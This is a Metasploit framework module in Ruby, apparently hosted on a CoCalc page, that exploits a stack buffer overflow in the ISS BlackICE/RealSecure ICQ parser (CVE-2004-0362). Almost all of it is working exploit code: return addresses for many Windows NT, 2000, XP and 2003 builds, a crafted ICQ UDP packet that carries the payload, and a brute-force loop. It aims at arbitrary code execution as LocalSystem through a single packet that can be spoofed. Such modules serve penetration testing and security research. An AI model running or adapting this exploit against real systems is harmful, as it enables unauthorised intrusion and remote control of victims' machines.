CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the ISS products that use
16
        the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
17
        will result in arbitrary code execution as LocalSystem. This exploit
18
        only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
19
        address.
20

21
        The ISS exception handler will recover the process after each overflow, giving
22
        us the ability to bruteforce the service and exploit it multiple times.
23
      },
24
      'Author'         => 'spoonm',
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          ['CVE', '2004-0362'],
29
          ['OSVDB', '4355'],
30
          ['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html']
31
        ],
32
      'Payload'        =>
33
        {
34
          'Space'           => 504-31-4,
35
          'BadChars'        => "\x00",
36
          'MinNops'         => 0,
37
          'MaxNops'         => 0,
38
          'StackAdjustment' => -3500
39
        },
40
      'Platform'       => 'win',
41
      'Targets'        =>
42
        [
43
          [ 'Bruteforce',                   {  } ],
44
          [ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],
45
          [ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],
46
          [ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ],
47
          [ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ],
48
          [ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ],
49
          [ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ],
50
          [ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ],
51
          [ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ],
52
          [ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ],
53
          [ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ],
54
          [ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ],
55
          [ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ],
56
          [ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ],
57
          [ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ],
58
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
59
          [ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ],
60
          [ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ],
61
          [ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ],
62
          [ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
63
          [ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
64
          [ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ],
65
          [ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ],
66
        ],
67
      'DisclosureDate' => '2004-03-18',
68
      'DefaultTarget'  => 0))
69

70
    register_options(
71
      [
72
        Opt::RPORT(1)
73
      ])
74
  end
75

76
  def exploit
77
    datastore['RPORT'] = rand(65536) if rport == 1
78

79
    targs = [ target ]
80

81
    if target.name =~ /^Brute/
82
      if target['Targets']
83
        targs = []
84

85
        target['Targets'].each { |idx|
86
          targs << targets[idx]
87
        }
88
      else
89
        targs = targets.dup
90

91
        targs.delete_at(0)
92
        targs.delete_at(0)
93
        targs.delete_at(0)
94
      end
95
    end
96

97
    targs.each { |targ|
98
      print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")
99

100
      shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
101
      email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode
102

103
      # Hopefully this structure is correct -- ported from msf 2.  Blame me
104
      # (skape) if it doesn't work!
105
      packet    =
106
        # SRV_MULTI
107
        [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +
108
        # SRV_USER_ONLINE
109
        [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
110
        [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
111
        # SRV_META_USER
112
        [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
113
        "\x00\x00\x0a" + # subcommand / success
114
        "\x00\x00"     + # nick length / nick
115
        "\x00\x00"     + # first length / first
116
        "\x00\x00"     + # last length / last
117
        [email.length].pack('v') + email +
118
        "\x00\x00\x00\x00\x00\x00\x00"
119

120
      print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")
121

122
      connect_udp(true, { 'CPORT' => 4000 })
123
      udp_sock.put(packet)
124
      disconnect_udp
125

126
      print_status("Sleeping (giving exception handler time to recover)")
127

128
      select(nil,nil,nil,5)
129
    }
130
  end
131
end
132

133